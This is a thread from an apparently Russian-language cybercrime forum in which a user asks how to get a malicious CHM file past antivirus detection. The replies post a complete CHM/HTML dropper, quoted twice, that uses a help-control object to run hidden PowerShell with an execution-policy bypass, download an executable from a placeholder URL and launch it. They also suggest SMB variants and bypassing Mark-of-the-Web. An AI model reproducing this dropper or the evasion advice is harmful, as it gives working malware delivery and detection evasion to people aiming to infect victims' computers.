• XSS.stack #1 – первый литературный журнал от юзеров форума

Malicious CHM File

wiseguy01

ripper
КИДАЛА
Регистрация
01.04.2021
Сообщения
157
Реакции
29
Гарант сделки
1
Пожалуйста, обратите внимание, что пользователь заблокирован
Hello,

I have made a malicious chm file, I obfuscated the HTML page and used calc.exe to test but still 6/60 on VT detect.
Any ideas how to fix?

Thanks,
WG01
 
Пожалуйста, обратите внимание, что пользователь заблокирован
using powershell line to run from CMD inside CHM and then load a batch file and runs it.
 
using powershell line to run from CMD inside CHM and then load a batch file and runs it.
Потому что твой код убитый на глухо, типа этого
149706209.gif

Код:
<html>

<head>
</head>
<body>
<object id=x classid="clsid:C4D2D8E0-D1DD-11CE-940F-008029004347" width=4 height=4>
<param name="Command" value="ShortCut">
<param name="Button" value="Bitmap::shortcut">
<param name="Item1" value=",cmd.exe,/c powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('URLTOFILE','%TEMP%\lol.exe');Start-Process %TEMP%\lol.exe;">
<param name="Item2" value="273,1,1">
</object>
<script>
x.Click();
</script>

</body>
</html>

Просто используй другие варианты тыц как пример с SMB бегом сюда тыц или тыц

 
Потому что твой код убитый на глухо, типа этого Посмотреть вложение 60335
Код:
<html>

<head>
</head>
<body>
<object id=x classid="clsid:C4D2D8E0-D1DD-11CE-940F-008029004347" width=4 height=4>
<param name="Command" value="ShortCut">
<param name="Button" value="Bitmap::shortcut">
<param name="Item1" value=",cmd.exe,/c powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('URLTOFILE','%TEMP%\lol.exe');Start-Process %TEMP%\lol.exe;">
<param name="Item2" value="273,1,1">
</object>
<script>
x.Click();
</script>

</body>
</html>

Просто используй другие варианты тыц как пример с SMB бегом сюда тыц или тыц

Ты на какой винде тестиш? ХР? На новых все файлы скачанные из интернета улетают в блок и на сканирование автоматом из за того что подписи нет. Держу в курсе.
 
Ты на какой винде тестиш? ХР?
8.1 с последними обновами.
На новых все файлы скачанные из интернета улетают в блок.
Может просто MOTW надо обходить, ставлю в курс
149706209.gif
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх